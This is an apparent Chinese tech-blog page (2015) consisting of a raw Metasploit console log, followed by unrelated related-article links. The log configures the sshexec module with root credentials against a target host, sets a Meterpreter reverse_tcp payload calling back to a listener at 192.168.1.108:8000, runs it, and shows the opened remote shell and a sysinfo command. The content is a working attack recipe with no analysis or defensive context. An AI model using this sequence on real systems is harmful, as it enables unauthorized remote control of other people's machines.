metasploit - sshexec
2015-08-15 10:38
507 查看
msf exploit(sshexec) > show options Module options (exploit/multi/ssh/sshexec): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD password yes The password to authenticate with. RHOST 192.168.1.103 yes The target address RPORT 22 yes The target port USERNAME root yes The user to authenticate as. Payload options (linux/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- DebugOptions 0 no Debugging options for POSIX meterpreter LHOST 192.168.1.108 yes The listen address LPORT 8000 yes The listen port Exploit target: Id Name -- ---- 0 Linux x86 msf exploit(sshexec) > run [*] Started reverse handler on 192.168.1.108:8000 [*] 192.168.1.103:22 - Sending stager... [*] Command Stager progress - 39.02% done (272/697 bytes) [*] Transmitting intermediate stager for over-sized stage...(105 bytes) [*] Sending stage (1495598 bytes) to 192.168.1.103 [*] Command Stager progress - 100.00% done (697/697 bytes) [*] Meterpreter session 1 opened (192.168.1.108:8000 -> 192.168.1.103:57760) at 2015-08-15 02:36:40 +0000 meterpreter > sysinfo Computer : kali OS : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) (i686) Architecture : i686 Meterpreter : x86/linux meterpreter >
相关文章推荐
- 3、ASP.NET MVC入门到精通——Entity Framework增删改查
- AutoBundle in asp.net mvc 5
- metasploit - local_exploit_suggester
- 在ASP.NET MVC中使用JQ插件datatable
- ASP入门(十一)-Session小案例
- How To Fix Error Loading RPi.GPIO Python Library On Your Brand New Raspberry Pi 2
- ASP入门(十)-Session对象
- asp.net mvc dropdownlist
- asp.net mvc AjaxBeginForm使用
- Asp.net动态页面静态化之字典哈希表的输出已及遍历判断的实现
- asp.net 输出单引号 双引号
- asp.net判断上传文件格式的方法
- asp.net 批量下载实现(打包压缩下载)
- asp.net mvc邮箱激活
- 【ASP.NET开发】获取客户端IP地址 via C#
- [Solution] ASP.NET Identity(1) 快速入门
- ASP.net MVC3里的HandleErrorAttribute
- 为Raspberry Pi 2编译内核模块
- ASP.NET 操作XML文件,超簡單的方法
- asp.net mvc Area使用